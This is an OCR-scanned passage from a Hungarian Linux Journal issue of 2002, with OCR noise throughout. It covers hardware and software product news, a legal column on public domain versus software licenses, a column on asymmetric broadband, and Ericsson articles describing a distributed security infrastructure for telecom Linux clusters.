nélkül átalakítani az AMD nyolcadik 
nemzedékbeli Opteron és Athlon 
processzoraira. Az átviteli folyamat- 
ból így kiküszöbölhető a többszörös 
fordításból, összeépítésből és kipró- 
bálásból álló lépéssorozat, mivel az 
alkalmazás vagy alkalmazásrendszer 
összes forrásállományát és fejlécét 
egyszerre vizsgálja át. A 64Express 
lehetővé teszi, hogy a felhasználók 
észrevegyék az átállásból adódó gon- 
ró hibákat, csökkenti a kipróbálás és 
hibakeresés idejét, más megoldáso- 
kat javasol, és tervezhetőbbé teszi a 
folyamatot. Az eredeti forráskód nem 
módosul, amíg a felhasználó el nem 
fogadja a javasolt változtatást, és a 
változásokról részletes napló készül. 
Adatok: MigraTEC, 

2 http:/Awww.migratec.com 


MontaVista Carrier Grade 
Edition 2.1 

A MontavVista be- 
jelentette a Linux 
Carrier Grade 
Edition 2.1 (CGE) 
— az általuk fej- 
lesztett kereske- 
delmi carrier-grade minőségű Linux- 
terjesztés — megjelenését. A CGE-t 
hálózati berendezések üzemeltetői- 
nek tervezték, szabványos, modulá- 
ris kapcsolattartó felületként. A ma- 
gas rendelkezésre állást többek 
között a CompactPCI üzem közben 
cserélhető meghajtói, a többszörös 
ethernet és a RAID1 biztosítja. 

A CGE megerősített illesztőprogra- 
mokkal rendelkezik, erőforrás-megfi- 
gyelésre képes és hibakezelő szolgál- 
tatásai is vannak. A CGE támogatja 
a PICMG 2.16-megfelelő Compact- 
PCI felületeket és az Intel IA-32 pro- 
cesszorok köré épített szabványos 
állványba szerelhető rendszereket. 
Adatok: MontaVista Software 

2 http:/Awww.mvista.com 


VERITAS NAS és 
Clustering Software 

A VERITAS több új termék megjele- 
nését is bejelentette, többek közt 
egy hálózati tárolóeszközét (NAS) és 





Industry s First COTS Linux Platform 
for Telecommunicotions 


egy telepkezelő N Össz. 
programét. vat Einermet Netven 
A ServPoint NAS 


RAID-megoldáso- 
kat használ, és 
képes biztonsági 
mentésre, kötetkezelésre, 
legfeljebb 32 csomópontból 
álló telep kialakítására, vala- 
mint leállás utáni helyreállításra. 
Sokféle operációs rendszer és alkal- 
mazás képes a NAS-on a hálózaton 
keresztül állományokat tárolni, illetve 
megosztani. A VERITÁS Cluster 
Server kiszolgálókat egyesít, és sok- 
féle alkalmazást kezel eltérő környe- 
zetben. Támogatja a legfeljebb 

32 csomópontbáól álló SAN-géptele- 
pek kialakítását, és a hagyományos 
ügyfél-kiszolgáló környezeteket. 

A VERITAS azt Is bejelentette, 

hogy Linux-termékcsaládját az IBM 
eServer xSeries géptípusra és a 

Dell PowerEdge kiszolgálóra is elér- 
hetővé teszi. 

Adatok: VERITÁS Software, 

2 http:/Awww.veritas.com 
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Sangoma ADSL-modem 

A Sangoma megjelentetett egy 
belső széles sávú ADSL-modemet, 
amely minden Linux- és FreeBSD- 
változattal képes együttműködni. 
Az 5518 nevű kártyát üzleti kiszol- 
gálókba tervezték, és minden észak- 
amerikai irodai berendezéshez 
csatlakoztatható. A Sangoma 
WANPIPE programjával együtt 
használva a következő adatátviteli 
sebességek érhetők el: 10,5 Mb/s 
nagysebességű, 8 Mb/s teljes 
sebességű, 4 Mb/s a G.Lite letől- 
tésnél és 1 Mb/s feltöltésnél. 

Az 5518 PCI 2.2 csatolófelülettel 
rendelkezik és megfelel az ITU 
G.992.1 (G.DMT), ITU G.992.2 
(G.Lite), ITU G.992 Annex A, Annex 
C és ANSI T1.413 Issue 2 ADSL- 
szabványoknak. Az illesztőprog- 
ramok támogatják a PPP over ATM, 
PPP over Ethernet, Ethernet over 
ATM és IP over ATM-szabványokat. 
Adatok: Sangoma Technologies 
Corporation, 

e-mail: sales-osangoma.com, 

2 http:/Awvww.sangoma.com 


Linux Journal 2002. október 


2002. november 


21 











0 Kiskapu Kft. Minden Jog fenntartva 


Láttuk-hallottuk 








0 Kiskapu Kft. Minden Jog fenntartva 


ev 





A Jogi tanácsadás 
megfelelő kerete egy 
Jogász-ügyfél 
kapcsolat, amely egy 
adott helyzet minden 
tényállását figyelembe 
veszi, és a helyileg 
érvényes jognak felel 
meg. Bár ezt a cikket 
egy jogász írta, a 
benne foglalt adatok 
nem helyettesíthetik 
az esetre szabott, 
bejegyzett jogásztól 
származó tanácsadást. 
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Niiért nem ér fel a public domain egy terjeszési engedéllyel? 


Ha az egész szerzői jogi és terjesztési engedély- 
kérdést el akarjuk kerülni, akkor sem járunk jobban 
— ne adjuk csak úgy oda a progrgamokat. 


Nem is komolytalan dolog elképzelni, ahogy egy program 
szerzője művét a magasba hajítja, hogy a szél kénye- 
kedve szerint bárhová fújja. Ez a kép találóan festi le a 
közkinccsé tett (public domain) programokat. A program- 
mérnökök a , public domain" (szó szerint: nyilvános tar- 
tomány) kifejezést úgy használják, mintha az egy olyan 
helyet jelölne, ahol a programmal mindenki azt tehet, 
amit csak akar. A közkinccsé tett programnak nincsen 
tulajdonosa. Még az állam sem birtokolja. Egyszerűen 

, szabadon használható", abban az értelemben, ahogyan 
az ingyen sör , szabadon elvehető" és ahogyan a szólás- 
szabadság ,szabad megnyilvánulást" tesz lehetővé. 
Valóban létezik a közkincsé tett szellemi alkotások tere: itt 
találhatók Bach szonátái, Shakespeare színművei, Leonar- 
do da Vinci rajzai és az Eiffel torony terve. Ezeket szó sze- 
rint bárki bármire használhatja, engedély nélkül. A szerzői 
jog által védett művek csak akkor válnak közkinccsé, ami- 
kor , megöregednek", és lejár a szerzői jogvédelem hatá- 
lya. Minden másnak - kétségkívül a közelmúltban készült 
valamennyi számítógépes programot is beleértve — meg- 
van valahol a tulajdonosa, azaz nem , vehető el szabadon". 
A szerzői jogi törvények értelmében a programokhoz 
kapcsolódó kizárólagos jogok nagyon hosszú ideig van- 
nak érvényben. A jelenlegi szabályozás szerint a szerzői 
jog a szerző halála után még hetven évig érvényes; az 
ismeretlen szerzőjű, nem a szerző neve alatt közzétett 
vagy megbízásra készített művek esetén a szerzői jog az 
első közzétételt követő 95 évig, vagy a mű létrehozását 
követő 120 évig érvényes — a két lehetőség közül az lép 
életbe, amelyik alapján előbb lejár a jogvédelem. A prog- 
ramírás új iparág, ezért ma még viszonylag ritkán talál- 
kozunk olyan fontosabb programokkal, amelyeknek a 
szerzői jogai elévültek. 

Éppúgy, ahogyan egy magánszemélynek semmiféle tör- 
vényes lehetősége nincs arra, hogy személyes tulajdonát 
közterületen szórja le, semmi sem teszi lehetővé a szerzői 
joggal védett művek kilökését a szellemi köztérbe, kivéve 
azt a folyamatot, amikor a mű a megfelelő idő elteltével 
elveszíti a szerzői jogi védelmet. Mindaddig, amíg a szer- 
zői jogok le nem járnak, egyetlen olyan jogi módszer sem 
létezik, amely lehetővé tenné, hogy egy program tulajdo- 
nosa úgy döntsön, a programot közkinccsé teszi. 

A szerzői jogi törvény 105. szakasza tartalmaz egy kivé- 
telt. Az Egyesült Államok kormánya által készített művek 
nem kerülhetnek szerzői jogvédelem alá, így eleve köz- 
kinccsé lesznek. A bíróságok ítéletei és a Kongresszus 
által hozott törvények a legkézenfekvőbb példák. Ugyan- 
akkor ez a kivétel csak a kormányalkalmazottakra vonat- 
kozik, a szerződéses munkavállalókra általában nem. 

Az egyetemi kutatók és kormányzati fenntartású labora- 
tóriumok rendszerint rendelkeznek műveik szerzői jogai- 
val, és azokat jogdíj ellenében továbbadhatják. Ezek miatt 
az okok miatt a szabad és nyílt kódú programok szem- 
szögéből a ,közkincs"-megoldás lényegében érdektelen. 


Bár a számítógépes programok számára nem létezik 
használható , közkincslerakó hely", egy program készí- 
tője dönthet úgy, hogy odaadja másoknak a művét. Nem 
kell jogásznak lennie ahhoz, hogy a megfelelő szavakkal 
ezt megfogalmazza: , Ez az én programom. Ezennel áta- 
dom mindazoknak, aki bármiféle elképzelhető célra 
használni akarják". Sajnos az effajta ajándék puszta 
álmodozás. A szerződésjog alapelvei értelmében egy 
ajándék nem kérhető számon. Az adományozó bármikor, 
bármilyen okból visszavonhatja az ajándékot — ez nem 
éppen az a biztonság, amire egy program hosszú távú 
használata esetén számítunk. 

Ez a ,neked adom engedély" semmiféle védelmet nem 
nyújt arra az esetre nézvést, ha az ajándékba adott prog- 
ram kárt okozna. Nyilvánvalóan szándékosan nem adunk 
tovább olyasmit, amiről tudjuk, hogy veszélyes lehet — ez 
bűncselekménynek minősülne. Ugyanakkor nem menekül- 
het meg a bírósági pertől az, akinek az ajándéka csupán 
véletlenül okozott kárt. Az ilyen felhasználási engedély 
kockázata sokkal jelentősebb, mint az adományozó lelkét 
gazdagító baráti érzelmek. A terjesztési engedélyek egyik 
értéke az, hogy alkalmat nyújtanak a felelősség kizárásá- 
ra, és a program , úgy, ahogy van" alapon történő terjesz- 
tésére. Ha egy programot elajándékozunk, kockázatos 
felelősségvállalási kötelezettséget vehetünk a nyakunkba. 
Figyeljük meg azt is, hogy a ,neked adom engedély" ado- 
mányozója semmiféle korlátozást nem terjeszt ki az aján- 
dékra vonatkozóan. Például a kapott programon bárki vé- 
gezhet titkos változtatásokat, és a módosított változatot 
kiadhatja jogdíjas programként, üzleti célú felhasználói 
engedéllyel. A Szabad Szoftver és Nyílt Forrás mozgalmak 
sok tagja szemében ez az egyik alapvető célt sérti: a sza- 
bad és nyílt kódú programok felhasználói ugyanúgy a 
sközzétett kód" játékszabályához igazodnak, mint az ere- 
deti kibocsátó. Ha valaki továbbadja a programot módo- 
sításokkal vagy anélkül, a kódot is közzé kell tennie. 

A ,neked adom engedély" nem teszi kötelezővé a kód köl- 
csönös megosztását (ahogyan egyébként a BSD, az MIT, 
az Apache és a hasonló terjesztési engedélyek sem). Ha 
a program másolását és terjesztését feltételekhez akarjuk 
kötni — akár olyan alapvető feltételekről legyen szó, ame- 
lyeket a nyíltforráskód-meghatározás (Open Source Defi- 
nition) tartalmaz —, terjesztési engedélyt kell használnunk. 
Ne hagyatkozzunk helyette az ajándékozásra! 

Ne fogadjunk el ajándékprogramot abban a hiszemben, 
hogy az közkincs. Ha fel akarunk ajánlani egy programot 
bármilyen elképzelhető célra, használjunk egy egyszerű 
terjesztési engedélyt, amilyen például az MIT-engedély. 
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Lawrence Rosen 

(2 http:/Avww.rosenlav.com) magán- 
gyakorlatot folytató jogász. A Nyílt 
Forrás Kezdeményezés ügyvezető 
igazgatója és jogtanácsosa 

(2 http:/Avw.opensource. org). 








Elkerülhetetlen a szimmetria? 


Doc arról elmélkedik, vajon a szimmetrikus Hálózatnak meg kell-e 
vívnia a maga harcát a feltöltésoldalon. 


zt a cikket egy kábeles kapcso- 
laton keresztül írom, ami 3 Mb/5-t 
biztosít a letöltésoldalon, vala- 
mint 300 Kb/5-t a feltöltésoldalon. Ez 
sokkal jobb, mint az előző otthonomban 
lévő szimmetrikus DSL-kapcsolat, ami 
144 Kb/s-t nyújtott. A kábelkapcsolatot 
szolgáltató társaság (Cox High Speed 
Internet) még azzal sem törődne, ha egy 
WiFi-alapú állomást helyeznék üzembe. 
Az sem feltétel, hogy előfizessek a kábel- 
televíziós szolgáltatásukra (nem is tet- 
tem meg). Iudva, hogy más kábel- és 
DSL-szolgáltatók mi mindent követel- 
nek az ügyfeleiktől, igazán nagyra érté- 
kelem a cég viszonylagos rugalmasságát. 
Kapcsolatom letöltésoldalának sávszé- 
lessége kétszer akkora, mint a tavalyi 
irodámban lévő 11-es kapcsolaté. 

Most, hogy újra otthon dolgozom, vá- 
lasztanom kell az olcsó, havi 35 dolláros, 
3 Mb/5/300Kb/s sávszélességű aszimmet- 
rikus kábelkapcsolat, és az , üzleti szol- 
gáltatások" csomag között, ami havi 

99 dollárnál kezdődik. Az üzleti csomag 
768/256 Kb/s sávszélességű kapcsolatot, 
valamint öt IP-címet kínál. Ha a régi 
11-es kapcsolatommal egyenértékű 
kapcsolatot szeretnék, akkor havi 309 
dollárt kellene ráköltenem, és még így is 
csupán 512 Kbss lenne a feltöltési oldal. 
A régi szép időkben, mielőtt az 
Excite-YHome tönkrement, és a Cox még 
Cox(ohome volt (és az w0Home gerinchá- 
lózatot használta), a cég még egyik irány- 
ban sem korlátozta az adatátvitelt. Ami- 
kor először költöztünk a kaliforniai Santa 
Barbarába (ahol most is élek és ahol min- 
dezek történnek), 2001 elején, kibérel- 
tünk egy tengerpart melletti házat. Ami- 
kor kijött a kábeles fickó, és üzembe he- 
lyezte a kábelmodemet, a sebesség elké- 
pesztő volt. Egy mozifilm-előzetes letöl- 
tése mindössze néhány pillanatot vett 
igénybe. A letöltési oldalon 7 Mb/s, míg 

a feltöltési oldalon 3 Mb/s volt a sávszé- 
lesség. Mintha az egész Internet egyetlen 
nagy helyi merevlemez lett volna. 
Amikor a jelenlegi házunkba költöztünk, 
a sebesség csökkent, de nem számotte- 
vően. Majd miután a Cox a saját gerinc- 
hálózatát kezdte el használni, a sávszé- 
lesség 3 Mb/5/300 Kb/s körül állapodott 
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meg. Bármennyit is fizetnék, kizárt, hogy 
a sebesség csupán a töredékét megha- 
ladná a régi TI1-es kapcsolatomnak. 

Ez az oka annak, hogy kemény dolláro- 
kat fizetek az Xo Communications cég- 
nek, amiért a saját internetes tartomá- 
nyomat, a searls.com-ot fenntartja. Gya- 
korta és sok állományt mentek ide. Né- 
hányuk a beszédeimet és az előadásaimat 
tartalmazza, amelyek akár 20 MB-nyi 
vagy még nagyobb helyet foglalhatnak. 
Jelen pillanatban havi 7,50 dollárt fizetek 
minden 10 MB-ért az alap 100 MB felett 
az Xo-kiszolgálón, és a költségeimet úgy 
próbálom kordában tartani, hogy a régi 
anyagokat letörlöm. Szükségem lenne 
egy nagyobb és olcsóbb tárolóhelyre. 
laláltam ugyan egy olcsóbb tárhelyszol- 
gáltatót, de ez még mindig sokkal többe 
kerülne, mintha a saját otthonomban 
oldanám meg a tárolást. Ami elvezet a 
nagy kérdéshez: miért ne szolgáltathat- 
nám az állományaimat otthonról, nagy 
sávszélességen? Végtére is nem szim- 
metrikusra tervezték a Hálózatot az első 
perctől fogva? Egy barátom jegyezte 
meg nemrégiben: , a telefonos és kábeles 
fickók sosem fogják megérteni, hogy mi 
a lényege a WiFi-technológiának. .. olyan 
gyorsan el fog terjedni, mint az Internet 
- nem őmiattuk, hanem ellenük." Egyet- 
értek, mivel hiszek abban, hogy az alapí- 
tói szándékoknak tartós befolyásuk van 
az elkövetkezendőkre. Ha az Internet 
alapítómérnökei azt akarták, hogy a há- 
lózat szimmetrikus legyen, akkor az lesz. 
A kérdés, hogy mikor? 55 éves vagyok, 
és szeretném, ha még az én életemben 
megvalósulna. Meg fog? 2002 január- 
jában írtam az úttörőnek számító KPIG 
nevű rádióállomásról, amely már hét éve 
folytat webes műsorsugárzást 

(2 http:/www.linuxjournal.com/article/ 
5971). Mindehhez Linuxot és más ingye- 
nes, szabad forrású programot használ- 
nak. A jelenlegi cikk írásának idején, 
július közepén, a KPIG már beszüntette 
webes műsorát, mert nem volt képes 
fizetni azt az őrült jogdíjat, amit a Copy- 
right Arbitration Royalty Panel szabott 
ki. A CARP ezáltal sikeresen leszűkítette 
a webes műsorszórás lehetőségét a nagy 
műsorszóró társaságok javára, amelyek 


közül egyet sem érdekel ez igazán. 
Vagyis az internetes rádiózás tulajdon- 
képpen számkivetett lett, és ezért az 
RIAA most olyan boldog, mint férgek 

a tettemen. Nagy győzelem volt ez az 
aszimmetria erőinek. És nem az utolsó. 
Vajon mikor kezdik el a széles sávú 
szolgáltatásokat nyújtó cégek a WiFHi-t is 
kiirtani, amely olyan gyorsan terjed, 
mint a gaz? Iudomásom szerint egyet- 
len szolgáltató cég sem vállalkozott 
eddig arra, hogy felkarolja a WiFi-moz- 
galmat, pedig nyilvánvalóan népszerű. 
Ehelyett inkább rosszallásukat fejezték 
ki azoknak az ügyfeleiknek, akik a kábel 
nélküli megoldásokat terjesztették el 

a szomszédságukban. 

De egyre több és több fogyasztó terme- 
lővé is válik — nemcsak eladható javak, 
hanem vélemények, befolyások terme- 
lőivé. Előbb vagy utóbb ráébredünk 
erre, hála a személyes életünkben jelen- 
lévő módszereknek. 

Két titkos fegyverünk van -— annyira 
titkosak, hogy a legtöbben nem is isme- 
rik fel őket. Az egyik a digitális video- 
kamera, a másik a digitális tényképező- 
gép. Egyre több és több filmet és képet 
fogunk készíteni, és fel akarjuk majd 
rakni őket a Webre, hogy megmutassuk 
családtagjainknak, munkatársainknak 
vagy vásárlóinknak. Hacsak nem követ- 
kezik be meredek és gyors árcsökkenés, 
a távoli kiszolgálók túl drsrága megoldá- 
sok maradnak. Egyébként is több értel- 
me lenne személyes adatainkat saját, 
otthoni merevlemezről szolgáltatni. 
Amikor ide eljutunk, a Cobalt Oubes és 
hozzá hasonló egyéb, linuxos gépekre 
alapuló üzletek virágozni fognak. Ami- 
kor ide eljutunk, helyreáll a szimmetria. 
Lehet, hogy nem holnap, de valószínű- 
leg még az én életemben. Remélem. 
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DSI: Biztonságos Linux a távközlésben 


Az Ericsson Research újfajta szerkezetet fejleszt 





a Linux-telepeken futó adatátviteli rendszerekhez alkalmazásokhoz. 


távközlési ipar érdeklődése a telepek iránt azért nagy, 
AA mert olyan távközlési tulajdonságokkal bírnak, mint 

magas rendelkezésre állás, megbízhatóság és mére- 
tezhető teljesítmény, ráadásul mindehhez költséghatékony 
gépeket és programokat használnak. Ezekhez a komoly köve- 
telményekhez most a kifinomultabb biztonság kérdése is csat- 
lakozott. Ennek ellenére igen kevés próbálkozás folyik a tele- 
peken is megfelelő biztonsági szintet nyújtó egységes osztott 
keretrendszerek felépítésére. 
Munkánk az Ericsson Researchnél jelenleg olyan programkód- 
megoldott valós idejű (soft real-time) osztott alkalmazások 
fejlesztése, amelyek nagyméretű Linux-alapú távközési telepe- 
ken futnak. Ezeknek a telepeknek folyamatos működés mellett 
kell lehetővé tenniük, hogy a karbantartók futás közben cserél- 
jék le az alkatrészeket és programokat, anélkül, hogy zavarnák 
a rajtuk futó alkalmazások működését. Az ilyen telepekben 
a telep csomópontjai közötti és a külső gépekre irányuló kap- 
csolattartás korlátozott. 
Írásunkban az új biztonsági szerkezet fejlesztése mögötti ala- 
pokat mutatjuk be, azaz a DSI (Distributed Security Infrastruc- 
ture) rendszert. A DSI többféle biztonsági módszert is támogat 
a távközlésben használt linuxos telepeken futó alkalmazások 
igényeinek megfelelően. A DSI ezeket az osztott módszerrel 
ellátott alkalmazásokat ruházza fel az elérési jogosultság, az 
azonosítás, a hitelesítés és a kapcsolattartási épség ellenőrzé- 
sének képességeivel. 


Igény újfajta biztonsági megközelítésre 

A telepekre számos biztonsági megoldás létezik, de semelyik 
ilyen megoldás nem kifejezetten telepek számára készült. 

A leggyakrabban használt biztonsági megközelítés több létező 
megoldás összevonása. Csakhogy a különböző biztonsági 
csomagok egybeépítése és karbantartása igen összetett feladat, 
és gyakran kiderül, hogy a különböző biztonsági módszerek 
egyáltalán nem képesek együttműködni. lovábbi nehézségek 
léphetnek fel sok csomag egyesítésekor, például a rendszerkar- 
bantartás és -fejlesztés esetében, hiszen a számos biztonsági 
folttal igen nehéz lépést tartani. 

A távközlésben használt telepekkel szemben ugyanakkor igen 
szigorú teljesítmény- és válaszidő-követelmények vannak 
érvényben, ami a biztonsági megoldások tervezését igencsak 
megnehezíti. Valójában számos biztonsági megoldás egysze- 
rűen nagy erőforrásigénye miatt nem használható. 

A jelenleg létező biztonsági megoldások felhasználói jogosult- 
ságokon alapulnak, és nem támogatják az egyazon rendszeren, 
de különböző processzorokon futó folyamatok közötti kapcso- 
lattartás hitelesítését és jogosultságait. A távközlési alkalmazá- 
sok esetében ugyanazt az alkalmazást kevés felhasználó futtat- 
ja igen hosszú ideig, megszakítás nélkül. 

A fenti elképzelés megvalósítása a különböző csomópontokon 
készült folyamatokhoz ugyanazokat a biztonsági előjogokat 
rendeli. Ez pedig oda vezet, hogy az osztott rendszer számos 
tevékenységére nem fogunk biztonsági ellenőrzést végezni. 
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1. ábra A DSI osztott szerkezete 


A DSI jellemzői 


Minthogy a DSI maga is egy távközlésben használt Linux-telep 

része, meg kell felelnie a megbízhatóság, a méretezhetőség és 

a magas rendelkezésreállás távközlési követelményeinek. Ezen 

kívül a DSI a következő elvárásokat is teljesíti: 

1. Egységes keretrendszer: a biztonságnak egységesnek kell 
lennie a heterogén alkatrészek, az alkalmazások, a köztes 
réteg (middleware), az operációs rendszer és a hálózati 
megoldások különböző szintjén keresztül. Minden szerkezet- 
nek illeszkednie kell a másikhoz, hogy a rendszeren található 
minden kihasználható biztonsági rést kiküszöböljön. 

2. Folyamatszintű megközelítés: a DSI kicsiny alapegységen, 

a folyamaton alapul. 

3. A legkisebb teljesítménycsökkentő hatás: a biztonsági képes- 
ségek bevezetésének nem lehet komoly teljesítménymér- 
séklő hatása. A teljesítmény ideiglenes csökkenése a bizton- 
sági összefüggések kezdeti telepítésekor engedélyezett; 
ugyanakkor a további elérésekre gyakorolt hatásának elha- 
nyagolhatónak kell lennie. 

4. [dőocsztásos biztonság: a biztonsági összefüggések megváltoz- 
tatása a futó biztonsági szolgáltatásokban azonnali hatást 
eredményez. Valahányszor a cél biztonsági beállításai meg- 
változnak, a rendszer az új biztonsági összefüggéseknek 
megfelelően újraértelmezi a jelenlegi erőforrás felhasználását. 

5. Menet közben frissíthető szabályok: lehetővé kell tenni az 
osztott biztonsági rendszabályok futásidejű megváltoztatását. 
Az adatátviteli kiszolgáló csomópontoknak folyamatos és 
hosszú távú elérhetőséget kell biztosítani; ezért lehetetlen 
egy szolgáltatást pusztán azért megszakítani, hogy az új 
biztonsági rendszabályokat beállítsuk. 

6. Áttetsző kulcskezelés: a kapcsolatok biztosítása érdekében 
titkosítási kulcsok készülnek. Ez nagy mennyiségű kulcsot 
jelent, amelyeket biztonságosan kell kezelni és tárolni. 





A DSI szerkezete 

A DSI kétféle összetevővel bír: a kezelőfelülettel és a szolgálta- 
tással. A DSI-kezelőfelület egy vékony réteg, amelybe a bizton- 
sági kiszolgáló, a biztonsági és a biztonsági kapcsolattartó csa- 
torna tartozik (1. ábra). A DSI-szolgáltatás egy rugalmas réteg, 
amely a szolgáltatások helyettesítésével és eltávolításával igény 
szerint módosítható vagy frissíthető. 

A DSI kezelőfelületének központi eleme a biztonsági kiszol- 
gáló. Ez ugyanis a biztonsági műveletek és a kezelőfelület, 


A DSI alkotórészei 
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Biztonsági ügynökök kapcsolati csatorna 


(2) Fejlesztési hozzájárulásra vár 


2. ábra ADSI elemei 


illetve a betörésérzékelő rendszerek belépési pontja. Itt hatá- 
rozzuk meg a teljes telepre vonatkozó dinamikus biztonsági 
környezetet azáltal, hogy osztott környezetben minden bizton- 
sági kezelőnek szétsugározzuk a változásokat. 

A telep minden csomópontján a biztonsági kezelők gondos- 
kodnak a biztonsági szabályok betartásáról. Ők felelősek a 
biztonsági környezet megváltozásának helyi érvényesítéséért 
is. A biztonsági kezelők kizárólag a biztonsági kiszolgálóval 
cserélnek (biztonsági) adatot. 

A biztonságos kapcsolattartási csatorna a biztonsági ügynökök 
közötti titkosított és hitelesített kapcsolattartásért felelős. 

A biztonsági kiszolgáló és a külvilág között áramló minden 
adat a biztonságos csatornán halad keresztül. Két csomópont 
(hogy elkerüljük az egyetlen csomópont meghibásodásával 
járó gondokat) ad otthont a biztonsági kiszolgálónak és a 
különféle biztonsági szolgáltatóknak, például a bizonyítvány- 
hitelesítőnek. 

A biztonsági módszer széles körben elterjedt és kipróbált algo- 
ritmusokon alapul. A felhasználók nagy valószínűséggel képte- 
lenek áttörni ezeket a megoldásokat; ezért a biztonság végre- 
hajtására a magszint a legmegfelelőbb. Minden biztonsági 
döntés — amikor szükségessé válik — rendszermagszinten kerül 
megvalósításra, akárcsak a fő biztonsági kezelőelem, amely a 
rendszermagba ágyazva található meg. Ezeket a beágyazásokat 
modulok betöltésével végezzük. 

A DSI-szerkezet minden egyes csomóponton lazán összeillesz- 
tett szolgáltatásokból áll. Minden szolgáltatás készítésétől fogva 
jelenléti jelzéseket küld a helyi biztonsági kezelőnek, amely 
bejegyzi a szolgáltatást, és elérési módszerüket a belső modu- 
lok által elérhetővé teszi. Kétfajta szolgáltatás: az egyik a biz- 
tonsági szolgáltatások (jogosultságellenőrzés — access control), 
az azonosítás (authentication), az egységesítés (integration), az 
ellenőrzés (auditing); a másik a biztonsági szolgáltatók (például 
a biztonsági kulcskezelő) már felhasználói szinten futva 
szolgálja ki a biztonsági kezelőket. 
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A jelenlegi eredmények 

A jelen pillanatig a lemeznélküli Linux-kiszolgálók biztonságos 
indítási rendszere készült el. A csomópontok indulásakor a 
digitális aláírásokkal támogatott biztonságos indítás (secure 
boot) és az osztott megbízható számítási bázis (DICB) érhető 
el. A biztonsági indításhoz használt rendszermag elég kis mé- 
retű ahhoz, hogy sérülékenységét alapos vizsgálatnak vethes- 
sük alá. lovábbá a futtatható állományok digitális aláírás hite- 
lesítése, illetve a helyi biztonsági hitelesítő (local certification 
authority) megakadályozza a DICB rosszindulatú módosítását. 
A Linux Security Module (LSM) modul alapján készítettünk 
egy biztonsági modult is, amely a DSI-elérési jogosultság szol- 
gáltatás részeként betartatja a biztonsági szabályokat. Ezt a 
modult egybeépítettük az SCC-vel, így hozva létre az osztott 
eléréskezelési szerkezetet. A DSI jelenleg a teljes telepben 
folyamatszinten támogatja az időosztásos és a menet közben 
frissíthető biztonsági rendszabályokat. 

Hogy megkönnyítsük az osztott biztonsági rendszabályok fel- 
ügyeletét és karbantartását, tanulmányokat végeztünk a csomag- 
kezelő rendszerekben (például az RPM-ben) is megtalálható 
adat-újrahasznosító módszerek kifejlesztésére, hogy a biztonsági 
rendszabályok egy részét így állítsuk elő, vagy ezt az adatot a 
csomagba helyezzük (ha ez a legmegfelelőbb megadási forma). 
Ezek az erőfeszítések egyben azt is célozzák, hogy a rendszabá- 
lyokat a program telepítéskor, beállításakor, működésbe lépése- 
kor és végrehajtásakor teljesen más jogosultságok kiadására 
használjuk. A rendszabályok, a fordítási és betöltési módszerek 
kifejezésére használt pontos nyelvezet még kiegészítésre szorul. 
Részlegesen a biztonságos kapcsolattartási csatornát is elkészí- 
tettük az OmniORB, a CORBA nyílt forrású változata alapján. 
Az SCC-logika a hordozható rétegre (portability layer) került, 
ezáltal a megvalósítást sikerült a felhasznált kapcsolattartó 
középrétegtől (middleware) függetleníteni. A CORBA válasz- 
tását SCC kapcsolattartó középrétegként több tényező is 
indokolta, többek között az osztott, valós idejű és beágyazott 
rendszerek támogatása és a jó együttműködés. 
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A DSI mint nyílt forrású projekt 

A DSI-vel az a tervünk, hogy a teljes keretrendszert nyílt for- 
rásúvá tegyük, hogy a különböző szervezeteket és nyílt forrás- 
kódon munkálkodó fejlesztőket is bevonhassuk a különféle 
elemek tervezésébe és fejlesztésébe. A 2. ábra a DSI különféle 
elemeit ábrázolja. Minden kérdőjellel jelölt elem még terve- 
zésre és fejlesztési hozzájárulásokra vár. 


Összegzés 

A projekt honlapja 2002 júniusától érhető el. Itt a DSI jelentései, 
a bemutatók, a forráskódok és a további támogatók honlapjaira 
történő hivatkozások találhatók. lermészetesen bárki kapcso- 
latba léphet a DSI-csapat (alább felsorolt) tagjaival, ha a DSI 
szerkezetének részletes leírására, a stratégiára vagy a forrás- 
kódokra kíváncsi, esetleg az együttműködés lehetőségeiről 
szeretne beszélgetni. Ezen kívül a DSI-csapat , Further Details 
on DSI: a New Architecture for Secure Carrier-Class Linux 
Clusters" című cikkét a Linux Journal honlapján 

(2 http./www.linuxjournal.com/article/6053) meg lehet tekinteni. 


A csapat névsora és egy kiegészítő szöveg a 41. CD Magazin/DSI 
könyvtárában megtalálható. 


Lirnax dournat 2002. júltús, 99. számi 


Ibrahim F Haddad (lbrahim.Haddad6Ericsson.com) 


2002. november 25 
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Az osztott linuxos biztonsági modell 





Hozzáférés-ellenőrzés megvalósítása Linux-telepekre kihegyezett 


rendszermag-bővítmény segítségével. 


távközlési ipar magas igényeinek kielégítésére hagyo- 
AA mányosan nagy megbízhatóságú, magas rendel- 

kezésreállású és méretezhető telepeket használ oly 
módon, hogy közben költséghatékony gép- és programmegol- 
dásokat alkalmaz. Ezért gondolni kell a telepek biztonságának 
megteremtésére is, azonban erre eleddig még nem született 
hatékony megoldás. 
A távközlési iparból hiányzó biztonságos telepmegoldások 
pótlására az Ericsson Researchöz tartozó Open Systems Lab 
(Montreal, Kanada) egy új projektet indított útjára, amelyet 
osztott biztonsági háttérnek nevez (Distributed Security 
Infrastructure — DSI). A DSI elsődleges céljának tekinti az olyan 
fejlett biztonsági hátterek tervezését és megvalósítását, ame- 
lyekkel a távközlési iparban használt linuxos telepek bizton- 
sága megteremthető (lásd bővebben a 24. oldalon). A DSI egyik 
fontos eleme az osztott biztonsági modul (Distributed Security 
Module -— DSM), ami a linuxos telepeken a kötelező érvényű 
jogosultságellenőrzést valósítja meg. 
Ebben a cikkben azt tárgyaljuk, hogy milyen céllal alkalmaz- 
hatjuk az osztott biztonsági bővítményt, milyen lehetőségei 
vannak, továbbá tulajdonságait, felépítését és megvalósítá- 
sának jelenlegi állapotát is bemutatjuk. Egyúttal ismertetjük 
azt is, hogyan telepíthetünk DSM-et, és miként próbálhatjuk 
ki a működését. 


Kötelező érvényű jogosultság-ellenőrzés 

A jelenleg alkalmazott biztonsági megoldások valamilyen kü- 
lönálló jogosultság-ellenőrzésen alapulnak. Ezek a módszerek 
azonban alkalmatlanok a bonyolult rendszerek védelmére, 
arra, hogy a napjainkban használt fejlett támadási típusok 
ellen védekezzünk. A jogosultságok megítélése a felhasználó 
azonosításán és hovatartozásán alapszik. Ennek következtében 
ez az ellenőrzés könnyűszerrel megkerülhető, és az alantas 
szándékkal írt programok egyszerűen okozhatnak leállásokat 
és üzemzavarokat a rendszerben. A különböző kutatások kimu- 
tatták, hogy az operációs rendszer által biztosított kötelező 
érvényű jogosultság-ellenőrzés a teljes rendszer szempontjából 
